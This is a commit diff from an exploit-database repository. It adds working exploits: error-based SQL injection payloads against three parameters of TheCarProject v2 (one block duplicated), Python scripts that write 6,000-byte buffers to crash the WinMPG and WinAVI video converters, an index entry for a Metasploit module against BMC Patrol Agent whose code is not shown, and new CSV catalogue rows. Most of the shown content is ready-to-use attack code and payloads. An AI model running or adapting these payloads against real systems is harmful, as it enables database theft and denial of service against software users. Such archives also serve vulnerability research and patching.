DB: 2019-03-19
4 changes to exploits/shellcodes WinMPG Video Convert 9.3.5 - Denial of Service WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit) TheCarProject v2 - Multiple SQL Injection
This commit is contained in:
parent
5981a27702
commit
2a394cba09
5 changed files with 1277 additions and 0 deletions
1133
exploits/multiple/remote/46556.rb
Executable file
1133
exploits/multiple/remote/46556.rb
Executable file
File diff suppressed because it is too large
Load diff
83
exploits/php/webapps/46555.txt
Normal file
83
exploits/php/webapps/46555.txt
Normal file
|
@ -0,0 +1,83 @@
|
|||
===========================================================================================
|
||||
# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
|
||||
# Dork: N/A
|
||||
# Date: 17-03-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://thecarproject.org/
|
||||
# Software Link: https://sourceforge.net/projects/thecarproject/
|
||||
# Version: v2
|
||||
# Category: Webapps
|
||||
# Tested on: Wamp64, Windows
|
||||
# CVE: N/A
|
||||
# Software Description: A fully Featured Auto vehicle, Auto Dealer php
|
||||
sales web site software
|
||||
built on Bootstrap 3 it will present the best possible viewpoint for
|
||||
your customers
|
||||
unlimited items, unlimited images per item. Totally driven from the
|
||||
admin side of the site.
|
||||
===========================================================================================
|
||||
# POC - SQLi
|
||||
# Parameters : man_id
|
||||
# Attack Pattern :
|
||||
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
|
||||
# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1
|
||||
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
|
||||
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
|
||||
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
|
||||
===========================================================================================
|
||||
###########################################################################################
|
||||
===========================================================================================
|
||||
# Exploit Title: TheCarProject v2 - 'car_id' SQL Inj.
|
||||
# Dork: N/A
|
||||
# Date: 17-03-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://thecarproject.org/
|
||||
# Software Link: https://sourceforge.net/projects/thecarproject/
|
||||
# Version: v2
|
||||
# Category: Webapps
|
||||
# Tested on: Wamp64, Windows
|
||||
# CVE: N/A
|
||||
# Software Description: A fully Featured Auto vehicle, Auto Dealer php
|
||||
sales web site software
|
||||
built on Bootstrap 3 it will present the best possible viewpoint for
|
||||
your customers
|
||||
unlimited items, unlimited images per item. Totally driven from the
|
||||
admin side of the site.
|
||||
===========================================================================================
|
||||
# POC - SQLi
|
||||
# Parameters : car_id
|
||||
# Attack Pattern :
|
||||
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
|
||||
# GET Method : http://localhost/TheCarProject/cp/info.php?man_id=3&car_id=-1
|
||||
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
|
||||
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
|
||||
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
|
||||
===========================================================================================
|
||||
###########################################################################################
|
||||
===========================================================================================
|
||||
# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
|
||||
# Dork: N/A
|
||||
# Date: 17-03-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://thecarproject.org/
|
||||
# Software Link: https://sourceforge.net/projects/thecarproject/
|
||||
# Version: v2
|
||||
# Category: Webapps
|
||||
# Tested on: Wamp64, Windows
|
||||
# CVE: N/A
|
||||
# Software Description: A fully Featured Auto vehicle, Auto Dealer php
|
||||
sales web site software
|
||||
built on Bootstrap 3 it will present the best possible viewpoint for
|
||||
your customers
|
||||
unlimited items, unlimited images per item. Totally driven from the
|
||||
admin side of the site.
|
||||
===========================================================================================
|
||||
# POC - SQLi
|
||||
# Parameters : man_id
|
||||
# Attack Pattern :
|
||||
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
|
||||
# GET Method : http://localhost/TheCarProject/cp/item_listing.php?man_id=-1
|
||||
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
|
||||
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
|
||||
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
|
||||
===========================================================================================
|
29
exploits/windows/dos/46553.py
Executable file
29
exploits/windows/dos/46553.py
Executable file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: WinMPG Video Convert Local Dos Exploit
|
||||
# Date: 15.03.2019
|
||||
# Vendor Homepage:http://www.winmpg.com
|
||||
# Software Link: http://www.winmpg.com/down/WinMPG_VideoConvert.zip
|
||||
# Exploit Author: Achilles
|
||||
# Tested Version: 9.3.5 and older ones
|
||||
# Tested on: Windows XP SP3 EN
|
||||
|
||||
|
||||
# 1.- Run python code :WinMPG.py
|
||||
# 2.- Open EVIL.txt and copy content to clipboard
|
||||
# 3.- Open WinMPG.exe and Click 'ALL-AVI'
|
||||
# 4.- In the new Window click Register
|
||||
# 5.- Paste the content of EVIL.txt into the Field: 'Name and Registration Code'
|
||||
# 6.- Click 'Register'and you will see a crash.
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/env python
|
||||
buffer = "\x41" * 6000
|
||||
|
||||
try:
|
||||
f=open("Evil.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
||||
f.write(buffer)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
28
exploits/windows/dos/46554.py
Executable file
28
exploits/windows/dos/46554.py
Executable file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit
|
||||
# Date: 16.03.2019
|
||||
# Vendor Homepage:http://www.winavi.com
|
||||
# Software Link: http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe
|
||||
# Exploit Author: Achilles
|
||||
# Tested Version: 4.4.2
|
||||
# Tested on: Windows XP SP3 EN
|
||||
# Windows 7 x64 Sp1
|
||||
|
||||
|
||||
# 1.- Run the python script, it will create a new file with the name "Evil.avi"
|
||||
# 2.- Open WinAVI.exe and Click 'Convert to iPhone'
|
||||
# 3.- Load the file "Evil.avi"
|
||||
# 4.- And you will see a crash.
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/env python
|
||||
buffer = "\x41" * 6000
|
||||
|
||||
try:
|
||||
f=open("Evil.avi","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
||||
f.write(buffer)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
|
@ -6356,6 +6356,8 @@ id,file,description,date,author,type,platform,port
|
|||
46533,exploits/windows/dos/46533.txt,"Microsoft Windows - '.reg' File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
|
||||
46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
|
||||
46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
|
||||
46553,exploits/windows/dos/46553.py,"WinMPG Video Convert 9.3.5 - Denial of Service",2019-03-18,Achilles,dos,windows,
|
||||
46554,exploits/windows/dos/46554.py,"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service",2019-03-18,Achilles,dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -17255,6 +17257,7 @@ id,file,description,date,author,type,platform,port
|
|||
46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
|
||||
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
|
||||
46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
|
||||
46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -40995,3 +40998,4 @@ id,file,description,date,author,type,platform,port
|
|||
46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
|
||||
46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
|
||||
46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80
|
||||
46555,exploits/php/webapps/46555.txt,"TheCarProject v2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue